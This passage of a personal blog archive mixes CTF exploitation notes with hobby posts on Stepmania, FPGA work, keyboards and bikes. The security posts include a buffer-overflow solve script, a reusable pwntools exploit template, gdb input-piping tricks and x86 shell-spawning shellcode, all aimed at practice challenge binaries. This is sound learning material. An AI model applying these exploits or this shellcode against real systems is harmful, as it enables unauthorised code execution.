        p = process("/problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf/vuln", cwd="/problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf")
        p.sendline("36")
        p.sendline( "A"*32 + '\x49\x48\x77\x6a' + chr(c) )
        if "Flag" in p.recv(): print "good: %s" % hex(c)
# p.interactive()

# and our one-liner is
# python -c 'from pwn import *; print "100\n" + "A"*32 + "\x49\x48\x77\x6a" + "\xeb\x86\x04\x08" * 5' | ./vuln

rop

Simple ropchain satisfying a few constraints.

Adding Animations to SM5 Simply Love: DDRIllini

Sat, 06 Oct 2018 18:07:00 -0500

Learned:

Lua metatables (i.e. operator overloads)
Deleting frames from gifs in preview breaks them
Sora’s and Dan’s Stepmania docs are really nice

Oscar came up with a nice DDRIllini logo.

Animated (refresh if it stops, I messed with the gif)

Started from ScreenInit\ decorations/default.lua, which animates the collection of rainbow arrows when SL boots up.

From Daikyi:

InitCommand will happen during the loading of the specific screen the actor
is on. Guaranteed to run (in no guaranteed order) before any oncommand is
executed.

OffCommand runs when there is a screen transition.
some screens when transitioning from one to the other however have no
transition time

OnCommand: executed on load of screen, after init commands have run and
assets are loaded.

LoadActor looks like it’s concatenating tables, which is really weird to me. Lua has a construct called metatables and another called metamethods. Basically, operator overloads for table methods. So you can overload concatenation (..) for tables. See this for an example.

canonical pwntools script

Sun, 30 Sep 2018 05:52:00 -0500

I constantly find myself going back through old exploits for scripts, so I’m going to try keeping up my “current favorite pwn scripts” here.

from pwn import *

# change logging level. options: debug, critical (high, low)
context.log_level = 'critical'

p = process("./path")
# p = remote('host', 3333)

# useful with a pause() to connect gdb if pwnlib's gdb isn't working for
# whatever reason
# print util.proc.pidof(p) 

p.send("banana")
p.recv() # p sure this is capped at 4096 bytes or something
p.sendline("this sends a newline after")

# p.recvall()

p.interactive() # look we got a shell

# alternative to the above, keeps the pipe open after sending the exploit
# so as to enable you to actually use the shell.
cat <(python solve.py) - | ./binary
(python -c "print 'A'*2+'\x42'" ; cat) | ./bof

# int to little endian, in pwn but sometimes i don't have it installed
def p32(x): return struct.pack('<I',x)

OpenITG/Stepmania Switcher

Sat, 29 Sep 2018 14:01:00 -0500

a continuation of this post on building OpenITG

This closes one of the oldest issues on our issue tracker, which was nearly a year old!

The Problem

Stepmania 5 doesn’t support a lot of older content (namely couples and mods). Our cabinet runs both SM5 and the older version, 3.95, but swapping between the two requires running a script, which is only accessible to clubmembers with ssh access.

The Solution

Amazon dash buttons and the amazon-dash python package. Attached them behind the machine, and the cabinet’s users can now switch between versions.

passing to a process's stdin in gdb

Sun, 16 Sep 2018 17:07:00 -0500

via

Sometimes you want to pipe things into a process’s stdin (to emulate typing things, for example.)

echo "blah" | binary
python -c "print hello" | binary # is another common thing.

But what if you want to do that with a process you’re starting via gdb? Gets a little more complicated, but gdb has things built in to do such things.

# run it in a subshell and get the stdout fd
gdb binary
r < <(python -c "print '\x41'*36")

# bash command substitution into how gdb does stdin
r <<< $(python -c "print '\x41'*36")
# note! this handles nulls weirdly on stdin within gdb. (leakless, fireshellctf)
# the above did not have this issue.

Locating main() in a stripped & dynamically linked binary

Mon, 10 Sep 2018 21:38:00 -0500

Learned:

stripped binaries don’t point to main
binja can find it anyway
the dynamic linker runs before any of your program code
trying break _start in gdb will probably hit the linker’s instead

I was working on TokyoWesterns 2018 load and this came up (stackoverflow). Sebastian and I both tried identifying main this way and scratched our heads at why this approach wasn’t working, so I’m taking a second stab at it now. Note that the binary is both 64b and dynamically linked.

pwnable.kr: passcode

Sat, 01 Sep 2018 18:01:00 -0500

Partial RELRO means you can do GOT overwrites.
Full RELRO blocks them (marks the page as read-only after symbol resolution)

Learned a lot from https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html and https://www.akashtrehan.com/writeups/pwnablekr_todders_bottle/.

The point of this challenge is to teach you about GOT overwrites.

There’s a .plt.got and .got.plt section. I hate computers. .got.plt is the one that you want, as it contains addresses of library functions or addresses of code to call the linker to go resolve those addresses.

CTF Blog

Sat, 01 Sep 2018 14:01:00 -0500

I started a ctf blog at ctf-blog. It’ll probably contain during-competition, train-of-thought writeups and miscellaneous tidbits that I want to be able to find quickly during CTF.

Tokyo Westerns CTF: load

Sat, 01 Sep 2018 14:01:00 -0500

Not a complete writeup, just my thoughts while working on it.

Load

At first glance, it looks like it’s nontrivial to locate main() in a stripped ELF.

Via this SO question.

__libc_start_main has the following prototype:

int __libc_start_main(int (*main) (int, char**, char**), 
                      int argc, 
                      char *__unbounded *__unbounded ubp_av, 
                      void (*init) (void), 
                      void (*fini) (void), 
                      void (*rtld_fini) (void), 
                      void (*__unbounded stack_end));

So, we can look at the top address of the stack in order to get a pointer to main, set a breakpoint on it, and continue till we get there.

writing shellcode using fasm

Sat, 01 Sep 2018 14:01:00 -0500

Small binary file containing only shellcode

apt install fasm -y

; fasm example: this generates raw instruction in a file
; x86_32 shellcode
format binary
use32 ; 32b
    xor    eax,eax
    push   eax
    push   0x68732f2f
    push   0x6e69622f
    mov    ebx,esp
    push   eax
    push   ebx
    mov    ecx,esp
    mov    al,0xb
    int    0x80

; this generates a runnable executable
format ELF64 executable
use64
    push 0x20
    jmp  QWORD [rsp]

# assemble it
fasm blah.asm blah.bin

# you can read it into python, if you're constructing shellcode
with open("blah.bin") as f:
    shellcode = f.read()

RIP10, or, The Countless Positive Ways in Which Dance Games Have Changed My Life

Fri, 13 Apr 2018 19:16:00 -0500

Last month, we ran the 10th iteration of Rumble in the Prairie, DDRIllini’s yearly tournament. This was my third (and likely last) spring tournament, so I’d like to recap about how it’s grown and talk about the wonderful people who help make it happen.

(This is pretty long; links to different sections if you only care about some of it)

FPGA Stepmania

Sun, 10 Dec 2017 16:50:00 -0500

We implemented Stepmania (Dance Dance Revolution) on an Altera DE2-115 during the Fall 2017 semester of ECE385. Hopefully, the code can be of some use to others in the future. If you’re a future student reading this, feel free to contact me and ask questions.

Github repo, Google Drive folder (documentation), PDF of the final report

This post was released and written on 13 April 2018, but is backdated to match when we took the class.

Telegram Bot Markov Chains

Tue, 27 Jun 2017 04:00:47 -0500

Last semester, I took an “Introduction to Computational Linguistics” class.

It offered a survey of various topics in computational linguistics, such as part of speech tagging and machine translation, and a couple of simple projects to get your feet wet with the field. It was absolutely an introductory course, and I enjoyed it! Though to some extent I regret not taking the security course instead, but I’ll take that soon : )

THOTCON 8 Talk: How to Doxx 60,000 Students, and the 6 cons I went to

Mon, 26 Jun 2017 08:14:47 -0500

It’s halfway through a busy year! I’ve done six or seven cons and con-like events, depending on how you count “con-like event”. Boilermake in January, RIP9 and Cyphercon 2.0 in March, ISUCDC in April, Thotcon 0x8 and ACEN in May, and Circle City Con 4.0 in June. Overall, they went super well, though, for rather different reasons.

This year, I’ve been killing myself a bit between classwork and going to… more con{ventions,ferences} than anyone rightfully should during college. It’s great.

Collaborative College Keyboard Project

Fri, 12 May 2017 05:28:47 -0500

During my second semester of college, some friends and I decided to build custom split mechanical keyboards.

One of these friends owns a positively obscene number of keyboards, as he picks them up from garage sales and craigslist deals for cheap. He had several copies of the same keyboard, so I walked in to my room one day to find an Apple Extended Keyboard II on my desk. I’d been wanting to build an Ergodox for a couple of years, so this was an opportunity to do so in a cost-efficient manner. The other three members of our party had previously worked with custom keyboards, so we decided to start a project to build a bunch of cheap, custom Ergodox variants.

Building OpenITG for 64bit Linux

Wed, 19 Apr 2017 11:08:00 -0500

tl;dr download openitg compiled for 64bit debian/ubuntu/archlinux here. should work with the right versions of packages installed and libraries symlinked, which it’ll probably complain about when you try running it.

Couple extra things you might want to do for general quality of life, off of a stock SM3.95 install:

In openitg/Data/Stepmania.ini set inputdebounce to 0.050000.
Disable vocalize: in openitg/Themes/Simply\ Love/Vocalize/Vocalize.xml ctrl-f “defaults” and set it to vocalize = { 'None' , 'None' } -- defaults
Disable pad input to menus: in openitg/Data/Stepmania.ini, set ‘OnlyDedicatedMenuButtons=1’.

Background

We run an Arch Linux SM5 PC inside the U of I dedicab, which is a clone of a setup by Dan Guzek (dguzek) and David Nelson (mute).

NYT Mention

Wed, 08 Feb 2017 14:33:04 -0600

During one of my classes last semester, my professor stopped me and told me to go look up an article in the New York Times. I was very surprised/pleased to find the following:

Couple things.

There are no tater tots or donuts in the Rec Room.
As far as I know, the tables have never been orange-felted.
My hair is neither gelled nor in a unicorn horn.
How dare the author call it cheap. I like the Rec Room.

Still, this was an absolutely hilarious find. I’m really pleased that my professor noticed — the article was in the NYT and about David Foster Wallace, who grew up in Urbana/Champaign — and then made the connection that there’s really only one student on campus who matches that description.

VR-DDR

Sat, 28 Jan 2017 21:40:04 -0600

I went to Boilermake IV (Purdue’s yearly hackathon) with some friends. We made a virtual reality version of DDR with a full-rotation bar (source on github), and took third place overall. (The video quality is awful and I’m sorry.)

On Friday night, we met up with Purdue’s Music Gaming Club. Sometime after that, we realized the pad we brought (a $35 Craigslist Cobalt Flux with a little bit of onsite penny modding) was sending us unreliable input, so I asked to borrow one of the club’s pads, and they graciously obliged.

Octopress 3.0 Getting Started

Sat, 07 Jan 2017 12:32:04 -0600

Octopress 3.0’s docs don’t have one, so here’s a Github Pages quickstart. Based on this.

{% highlight bash %}

change this

USERNAME=username

change to just REPONAME if you’re using github project pages

REPONAME=$USERNAME.github.io

gem install octopress mkdir blog cd blog octopress new ./

git init git remote add deploy git@github.com:$USERNAME/$REPONAME.git octopress deploy init git git@github.com:$USERNAME/$REPONAME echo “_deploy.yml” » .gitignore

jekyll build git add . git commit -m ‘first deploy’ octopress deploy {% endhighlight %}

Discord SMS Bridge

Wed, 04 Jan 2017 20:43:39 -0500

A quick and dirty script to hook together Twilio (SMS) and Discord APIs, for a friend who can’t otherwise connect to Discord.

Github repo

Thanks to Zoe Helding for her help.

Dvorak

Wed, 07 Dec 2016 22:24:17 -0600

Just a quick post to keep me sane during the leadup to finals :^)

catfact.py: a cat fact delivery service

Mon, 19 Sep 2016 14:22:56 -0500

Instead of getting a full night’s sleep before a week of classes, I wrote a python script that sends cat facts to a list of ~~friends~~ logged in to our university’s server.

At least, they were friends when I added them to this list :^)

Gobby on OSX

Sun, 31 Jul 2016 01:54:45 -0500

The gobby download page somewhat unhelpfully states that “Gobby runs on Mac OS X, however we cannot offer a pre-built package at the moment.”

Someone’s compiled it and thrown it into brew’s repository, though.

brew install homebrew/gui/gobby

Install XQuartz (local X server on OSX, as far as I’ve gathered).

Find gobby’s executable on your machine (probably /usr/local/Cellar/gobby) and open it in XQuartz (right click, Open With > XQuartz)

Changing Your tmux Prefix

Wed, 27 Apr 2016 10:47:38 -0500

I couldn’t find a satisfactorily quick answer for this with a google search, so here it is plain.

Create a .tmux.conf in your home directory. Add the following to the file:

unbind-key C-b
set -g prefix C-a
bind-key C-a send-prefix

Making a Pebble display online users on a Minecraft Server

Sun, 10 Apr 2016 04:29:34 -0500

After last Christmas, I decided to buy myself a Pebble. I really wanted to write some kind of code for it. Since I was on break/had a ton of snow days, I set up a Feed the Beast (modded) Minecraft server to play with friends, running via Hamachi (a VPN).

Song Devocalizer Box

Mon, 26 Oct 2015 15:25:04 -0500

A friend of mine loves to sing. I saw a weekend project on Makezine a while back that I thought would be fitting for her.

Automatically Backing Up Terraria Saves/Worlds (Windows)

Thu, 03 Sep 2015 19:18:35 -0500

I recently set up a Terraria server to play on with new friends from school. I wanted regular backups, so I cobbled together a quick backup script. Here’s how to set it up.

Floppera

Wed, 27 May 2015 04:28:23 -0500

Ever wanted to hear floppy drives sing?

Google Tour

Sat, 07 Mar 2015 16:02:06 -0600

I led a group of students to a tour at Google’s Chicago office after school one day.

Raspberry Pi: NES-PC

Sun, 15 Feb 2015 16:25:48 -0600

To wrap up an old loose end with a friend, I finished building an NES-themed media center PC built around a Raspberry Pi.

We had originally started this project way before the Raspberry Pi was released, towards the end of 2011 or so. The initial plans were to throw a full-size motherboard and laptop CD drive into an NES case, along with a PicoPSU. Beyond cannibalizing the NES case, we never finished the original project, so over winter break we decided to throw a Raspberry Pi inside and finally wrap things up.

Randy Pausch: Final Lecture

Sat, 10 Jan 2015 03:33:26 -0600

Perhaps a few years late, but I just found this positively gorgeous final lecture by Randy Pausch.

As a wannabe computer science major/virtual reality geek, I’m really glad that I can directly relate to some of the work he did, and he’s got so many absolutely wonderful points throughout the entire video.

Something cool: At one point, he references a Pirates of the Carribean attraction he worked on. I remember going to that attraction, and thinking it was the coolest thing. Funny, the little ways you bump into people.

Bridge Competition

Tue, 09 Dec 2014 20:05:51 -0600

One of my school’s yearly events is a bridge competition put on by the science department and sponsored by a relatively successful construction company full of alumni. It’s been running some twenty-odd years, and my physics teacher dangled tasty extra credit in front of our class in exchange for a passing bridge.

So I partnered up and we built a bridge, and then another bridge because we had the spare parts and felt like it.

Eagle Project: Handicap-Accessible Picnic Tables

Thu, 04 Dec 2014 13:39:38 -0600

Two weeks ago, I finished my Eagle Project.

UPDATE: I was featured in the local newspaper (!!!)

It was a massive effort (much bigger than I anticipated) that ended up taking a cumulative 200 man-hours, 40 of my own.

The project was constructing from scratch three massive, handicap-accessible picnic tables for this really awesome place called Misericordia (my first-ever wikipedia page!). It’s a super-cool not-for-profit organization that does some really awesome things for a lot of people with disabilites.

Playing with the Experiment on Google IO's site

Sat, 08 Mar 2014 00:20:09 -0500

Looking at Google IO’s website (mostly with info for last year, so this is admittedly dated) I noticed an easter egg of sorts, a pretty Javascript application mysteriously titled "/experiment". The first thing you notice is the fact you can click on the I’s and the O’s. The next is that your inputs are tracked on the bottom of the screen. And then you noticed that there are right inputs and wrong inputs.

Building a Cheap Valentine's Day Card Audio Circuit

Sat, 22 Feb 2014 20:43:39 -0500

About two weeks before Valentine’s Day, I got the idea of making a Zelda-themed card for a friend of mine. She and I are both big Zelda fans. I searched the web for a card, until I found this one that I liked because of the extra dimensions. It seems that the pop-up style heart container card is a pretty popular one overall, and this is one of many.

I decided to take it another step, incorporating some of my (few) electronics skills into the project. To be honest, it was mostly an excuse to order some parts off of Digikey and super-nerdify what would otherwise be a fairly straightforward project. But hey! It was extraordinarily fun.

Accessing the Admin panel on Coke Freestyle Machines

Fri, 31 Jan 2014 23:23:06 -0500

Recently, a Meatheads burger joint opened up just down the street from my house. As a method of celebrating my first driver’s license and to say farewell to the pair of Lithuanians that had stayed with us through the week, we decided to go get some lunch.

While there, I noticed a pair of those snazzy new Coke machines, the kind that let you pick a multitude of flavors and mix it with various popular beverages. My brother reminded me that we had found the admin panel on a previous visit, so we decided to look for it again.

Why 1:1 iPad programs suck.

Tue, 07 Jan 2014 18:43:02 -0500

I consider myself a pretty efficient worker when I get down to it. Not that I work all the time (actually, I don’t work much of the time, but that’s another issue), but that I work with optimal utilization of available resources (read: I like configuring my gadgets to help me do things). It comes from a childhood of ample freedom with tech, in that my father always let me to take things from him and put them into the most useful form. Beyond that, I like technology. Hell, I love technology, and the productivity boosts it offers. So you might imagine my elation when my school announced it would begin a 1:1 iPad program starting this year.

about

Mon, 01 Jan 0001 00:00:00 +0000

For work, I look for security vulnerabilites and think about business risk. My nights involve thinking hard about the structure of our society, teaching friends how to code and find jobs, and playing games that are engaging and teach well. I thrive with human interaction and collaboration; “learning together” is my favorite hobby.

I’m fascinated by systems, especially when they very directly involve humans. I care a lot about keeping vulnerable populations safe.

accomplishments

Mon, 01 Jan 0001 00:00:00 +0000

things i had a hand in, often team efforts

2026 jan: moved to SF for a new security engineering role. cheapest plane ticket back from CCC was through Calgary so bought some fancy pants with a friend, then hit the ground running at a new job.
2025 dec: christmas in poland with family. chaos communication congress in hamburg, berlin NYE. met nadia heninger (cryptographer).
2025 oct: three weeks in japan — stayed at a traditional ryokan (watei), explored nagano, played piano in shin-okubo, hung out at a tokyo airbnb with a cryptographer and a VPN company CEO.

bike

Mon, 01 Jan 0001 00:00:00 +0000

seattle

Rodriguez Steel Blue

25-622 (28x1.00-700x25C) 6.0-8.0 bar, 85-115psi
ETRTO: 25-622
28 inch x 1 inch
700x25c (700mm outer diameter, 25mm width)
85-115psi

sf

Scott Speedster Gravel

55cm frame
700c tires
ultegra groupset
hydraulic brakes
50-34 front chainring
11-34 rear casette
35mm WTB cross boss rear tire
37mm WTB riddler front tire

Giant Defy

56cm frame (M/L)
700x32c tires
rival groupset
wireless shifters (SRAM AXS)
48-35 chainring
10-36 cassette

to buy

Pinarello Spoke Easy SF "Dogma, you're in between a 53 (5'9"-5'10") and 54 (5'10"-5'11")" "
Canyon
Giant Defy ✅, Cervelo Caledonia, or Look Optimum 765
S-Works (Specialized)
Factor
Scott Solace 2014 (purely bc it is sexy and I saw a dude with it once)
Bike tube size: 700 35 / 43 (REI)

ml-book-recs

Mon, 01 Jan 0001 00:00:00 +0000

via this
and this

Here is a very biased list of books and links that I found useful for students entering our lab (other labs may emphasize different aspects though):

Sipser's broad Introduction to the Theory of Computation
A comprehensive Survey of Deep Learning
Bishop's Pattern Recognition and Machine Learning (bible of traditional machine learning, probabilistic view)
Thesis of Graves (ex-IDSIA) on Supervised Sequence Labelling with Recurrent Networks (RNNs, not much of this in Bishop's book)

projects

Mon, 01 Jan 0001 00:00:00 +0000

Berlin Projects (2022–2025)

A chat-app QR code social sharing augmented reality game designed to encourage meeting new people at large events.

An in-browser lightweight VRChat alternative personal memory palace.

A VR puzzle competition connected to a real-life fishtank via submersible webcam video stream, designed to train binary reverse engineering skills.

more fishtank photos/video

Python Tiny CPU Emulator

Organizing Dance Game Tournaments

FPGA Rhythm Game

THOTCON 0x8 Talk: Student Privacy

Markov Text Generation Performance Measurement

Virtual Reality Dance Game Prototype

Collaborative College Keyboard Project

old (high school)

Building a Cheap Valentine’s Day Card Audio Circuit

Eagle Project: Handicap-Accessible Picnic Tables

Song Devocalizer Box

qr

Mon, 01 Jan 0001 00:00:00 +0000

you solved it! thanks for playing ^^

i don't have reporting set up, so you should ping me (iklatzco at gmail) or
twitter.com/ian5v to let me know that you
succeeded c:

salary

Mon, 01 Jan 0001 00:00:00 +0000

I've linked to these two blog posts so often that I wanted a short URL I could memorize:

Salary Negotiation: Make More Money, Be More Valued

tl;dr: This singlular blog post probably bumped my salary by 10-20%.

Tech salaries are high.
Negotiate over email if you can.
Don't disclose your numbers until the very end of the process.

Negotiation Tips

Another one, targeted at animators but has broadly useful tips

Don't Call Yourself A Programmer, And Other Career Advice

tl;dr: Programmers exist to create business value.

Technical beauty does not have much place in the "real world".
Understanding this can enable you to be a lot happier and effective at your job.

songs

Mon, 01 Jan 0001 00:00:00 +0000

Summer of 69

thotcon

Mon, 01 Jan 0001 00:00:00 +0000

"University Privacy: How to Doxx 60,000 Students" - Ian Klatzco and Adam Ringwood

Talk abstract (from conference website)

Lightweight Directory Access Protocol (LDAP) is at the heart of most large universities. A student may use it to login into campus computers, access campus email, and use it as a single sign on provider for university services. LDAP servers also store a student's personal information. This data can have poorly-chosen security settings that reveal sensitive data. We will discuss the privacy and implementation details at two Illinois public universities with a combined population of above 60,000. The directories contain many individuals affiliated with the schools, including graduates and faculty. We found almost every student's major, year in school, email address, phone number, and home address, using just a single student's credentials. University officials didn't find this information to be terribly problematic, citing a law passed in the 70s called FERPA. FERPA protects student educational information such as grades, but gives the university the ability to release student directory information without individual user permission. We will discuss how FERPA outlines the process of opting out of directory information as a student, and its shortcomings, such as limiting employer ability to check university records. The risks aren't limited to just personal directory information though: we will discuss what information can be mined from a user's password changed timestamp and last login timestamp. We show that attacks against user privacy are being carried out using university directories: businesses on campus harvesting emails using LDAP for marketing, and an individual who was scammed using personal information probably gathered from the system (http://bit.ly/uiucredditscam). We will discuss how these attacks can be prevented by changing technical policy and educating users."

Or if you prefer, a slightly more personal blog post reflecting on the experience of giving the talk.

urldecode

Mon, 01 Jan 0001 00:00:00 +0000

references

tldr: slightly different set of characters, one of them *might* need to be a URI that parses correctly?
encodeURI
encodeURIComponent